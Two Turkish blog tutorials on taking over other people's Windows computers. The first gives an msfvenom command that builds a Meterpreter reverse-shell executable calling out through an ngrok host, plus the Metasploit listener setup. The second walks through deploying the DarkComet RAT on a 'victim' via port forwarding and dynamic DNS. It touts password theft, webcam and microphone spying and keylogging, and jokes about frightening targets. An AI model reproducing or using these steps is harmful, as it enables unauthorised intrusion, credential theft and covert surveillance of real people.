Kategoriler
Linux Metasploit Siber Güvenlik

Msfvenom ile Uzaktaki Windows Makineye Saldırı

Metasploit serisine bu sefer uygulamalı bir yazı ile devam edeceğiz. Windows sistem kurulmuş makinelere metasploit ile rat hazırlayacağız ve karşı taraftan bağlantı almayı deneyeceğiz. Ancak farklı olarak ngrok kullanarak farklı ağdan internete çıkan makineler üzerinde de test edeceğiz.

Ngrok kullanımından daha önce Tembeller için Phishing: Blackeye yazımda anlatmıştım. Oraya bir göz atmanız yeterli. Bu yazıda mantığını es geçip uygulamasını göstereceğim.

./ngrok tcp 1212 komutu ile ngrok uygulamasında tcp tipinde 1212 portunu açıyoruz. Port numarası sizin keyfinize kalmış. Daha sonra bize verdiği beş haneli port numarasını(değişebilir) ve linki bir kenara alalım. Ngrok çalışmaya devam etsin. Msfvenom’a geçelim.

Şimdi msfvenom ile ratı oluşturalım.

msfvenom windows/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=11841 -f exe R > rat.exe

Ezbere gitmeyelim. Ne yaptık anlatalım. Msfvenom aracı ile windows sistemlerde reverse tcp bağlantı yapacak bir dosya hazırladık.  LHOST ile local adresimizi ngrok aracının verdiği bağlantıyı girdik. LPORT ile port adresimizi de ngrok sisteminin verdiği porta verdik. -f exe kısmında da exe dosyası tercih ettiğimizi belirttik. R > rat.exe ile istediğimiz rat dosyasını bulunduğumuz dizine rat.exe isminde oluşturduk.

Reverse tcp bağlantı nedir? Klasik mantıkta siz bir rat oluşturduğunuzda karşı makinede bir port açıp onun üstünden karşı makineye bağlanırsınız. Oluşturduğunuz rat karşı tarafta bir port açardı. Buna bind shell diyoruz. Reverse shell, buradaki adı ile reverse tcp bağlantı ise saldırgan tarafta port açılması, karşı makinenin o porta bağlanarak veri aktarması mantığına dayanır.

Rat dosyasını oluşturduk Karşı tarafa atmadan önce oluşturduğumuz ratı dinlemeye alalım. “msfconsole” komutu ile metasploiti çalıştıralım. Daha sonra use exploit/multi/handler diyelim. Daha sonrasında ise aşağıdaki bilgileri girmemiz yeterli.

set LHOST 127.0.0.1

set LPORT 1212

run

Karşı taraf dosyayı açtığında bağlantı gelecek ve sistemde yetkinize bağlı olarak işlem yapabileceksiniz. Diğer sıkıntı ise anti virüs uygulamaları anında fark edecektir. Windows defender da buna dahil. Karşı tarafa anti virüs uygulamalarını eliyle kapattırmak gerekiyor. Biz antilerden nasıl kaçarız, kalıcılığı nasıl sağlarız, yetki yükseltme işlemini nasıl yaparız ayrı ayrı anlatacağız.

Kategoriler
Siber Güvenlik Video

Karşı PC’ye Sızma Detaylı Anlatım

Merhaba arkadaşlar, RAT konusunda sorularınızı buradan alacağım ve en detaylı şekilde anlatacağım.Hem videolu hem görselli bir döküman olacak ki bu sizin anlamanızı ciddi anlamda kolaylaştıracaktır.

Öncelikle RAT, keylogger, trojan nedir?

Hepsini tek kalıba sokmak gerekirse, karşı tarafın bilgisayarına bir dosya gönderirsiniz.Karşı taraf bu dosyayı açtıktan sonra o bilgisayarı ele geçirmiş olursunuz. Kendi bilgisayarınızmışçasına hoyratça kullanabilirsiniz.

RAT ile yapılabilecek işlemler nedir?

Aslında kullandığınız RAT programına göre çeşitleri var.Yine farklı farklı örnekler de vereceğiz.Biz en ünlü olan Darkcomet üzerinden gidelim.

•RAM&CPU durumu izlenebilir
•Masaüstündeki ikonlar, başlat çubuğu, çubuktaki saat gizlenebilir.
•CDROM tek tuşla açılıp kapatılabilir. ( O an kurbandaki korkuyu siz düşünün.)
•Piyano çalarak ona gönderebilirsiniz.Karşı tarafın bilgisayarında aynen çalacaktır.
•Anlık mesajlaşma sistemini açarak karşı tarafla anonim bir iletişime geçebilirsiniz.
•Bir metin hazırlayıp bunu Microsoft Reader ile seslendirerek karşı tarafta o metni okutabilirsiniz.
•Bilgisayarındaki programları görebilir ve bunları kaldırabilirsiniz.
•HTML, bat ve daha birçok dosyayı karşı tarafta açabilirsiniz.
•Karşı tarafın bilgisayarındaki tüm dosyaları çekebilirsiniz, silebilirsiniz,ismini değiştirebilirsiniz,kendi bilgisayarınızdan dosya gönderebilirsiniz.
•Sitelerde girdiği kullanıcı adı, şifreleri liste halinde görebilirsiniz.
•(Eski Bir Özellik) MSN hesabına birebir erişebilirsiniz.
•Kamerasını izleyebilirsiniz.
•Mikrofonunu dinleyebilirsiniz.
•Bastığı her tuşu, yazdığı her mesajı her şeyi rapor halinde alabilirsiniz.
•İnternet ağındakileri de görebilir, açık portlara bakabilir ve bu ağa dair çok işlem yapabilirsiniz.
•Yazıcısını kullanmanız da mümkün
•Bilgisayarını kapatabilir,açabilir,uykuya alabilirsiniz.

Peki tüm bunları nasıl yapacağız?

1) Darkcomet RAT İndirelim.

2) Port Açalım

Bunun için modem panelinize girmelisiniz.

Başlat Menüsü –> Arama Kısmı –> cmd —> ipconfig
Varsayılan Ağ Geçidi’nin karşısındaki adresi alın.Bendeki 192.168.2.1 modeme göre değişebilir.

Image

Daha sonra internet tarayıcınıza yazın bu adresi.Girdikten sonra karşınıza bunun gibi bir panel çıkacak.Yine modem markanıza da bağlı…

Image

Kullanıcı Şifre bilmiyorsanız muhtemelen hiç değiştirmemişsinizdir.

Buradan öğrenebilirsiniz : Modem Arayüzleri | Modem Şifreleri, Modem Arayüz, Modemler, Modem IPleri, Modemler Hakkında, Modem Kurulumu, Modem Kurulum, Modem Yapılandırma, Modem Arayüzü

Eğer bu da olmazsa modeminizin reset tuşu vardır üzerinde ona bir süre basılı tutup uygun bilgileri tekrar girin.

Şimdi de “Port Yönlendirme” seçeneğini buluyoruz menüde.Birebir aynı yazmayabilir.Menüyü kurcalamaya devam edin.Elbet çıkacaktır.Yine bulamayan yazsın konu altına da bakalım.

Image

Şimdi bunu nasıl dolduracağız?

Öncelikle etkinleştir kutucuğunu dolduruyoruz.
İsim ne yazarsanız artık kafanıza göre…
Protokolde TCP AND UDP seçeneğini seçiyoruz.

WAN Bilgisayar başlangıç IP Adresi ve LAN bitiş IP adresi, LAN Bilgisayar IP Adresine ise aşağıdaki gibi bakacağız…

Başlat Menüsü –> Arama Kısmı –> cmd —> ipconfig

Bu defa IPv4 Adresini yazıyoruz…

Wan Bağlantısı : Dokunmaya gerek yok.
WAN Başlangıç Portu : 1604 (Klasik darkcomet portu oldu artık)
Wan Bitiş Portu : 1604
MAC adresi eşleştirme : Boş kalacak
LAN başlangıç portu : 1604
LAN bitiş Portu : 1604

Özetle Görsel :

Image

Şunu gördünüzse port tamamdır :

Image

Tüm bunları yapamadınız mı? Arayın TTNET’i yahut artık hangi firmaysa sizinki…Port açamıyorum benim yerime açar mısınız diyin.Amacı söylemenize gerek yok.Açacaklardır.

3) IP adresi sabitleme

Giriyoruz NOIP in sitesine… http://www.noip.com/

Giremiyorsunuz değil mi? Elemanlar Türkiye’ye sitelerini kapatmış.E nasıl gireceğiz?
Proxy kullanacağız.Zenmate kullanıyorum ben.

Sign Up butonuna tıklayın.

Image

Bedava üyelik alıyoruz tabiisi.

Image

Daha sonra şuradan indiriyoruz NOIP programını : https://www.noip.com/download?page=win

Programı açıp kurduktan sonra şu ekran karşımıza gelecek.NOIP üyeliğimiz ile giriş yapıyoruz.

Image

Sonra aşağıdaki ekran gelecek.Edit Host’a tıklayın.Bende her şey tamam olduğundan tik işareti var.Sizde çarpı işareti olacaktır.Sıkıntı yok biz tikletiriz.

Image

Listemizdeki domainin yanına bir tik attırıveriyoruz.Sonra “Save” diyoruz.E NOIP de hallolmuştur.

Image

4) DARKCOMET’i açıyoruz…

Üstteki menüye tıkladıktan sonra Server Module’ye ordan da Full Editor e giriyoruz.

Image

RAT’ı kendi modeminizden internete giren birine yedirmek istiyorsanız aşağıdaki gibi adrese 127.0.0.1 yazın.Port 1604

Image

Kendi internet ağınıza bağlı olmayan dışardan birine atacaksanız -ki genelde budur olay- adrese NOIP den aldığımız hostu gireceğiz.Port yine 1604.

Image

Kurbana rat dosyasını attıktan sonra açarsa listenizde aynen çıkacaktır.İstediğiniz kurbana çift tıklayarak inceleyebilirsiniz.

Image

İşte Kullanacağımız menü :

Image

Şifreleri çekmek için :

Image

Kamera Özelliği :

Image

Keylogger (Klavye İşlemleri) :

Image

Dosyaları Çekmek İçin :

Image

Eğlenceli Özellikler… :

Image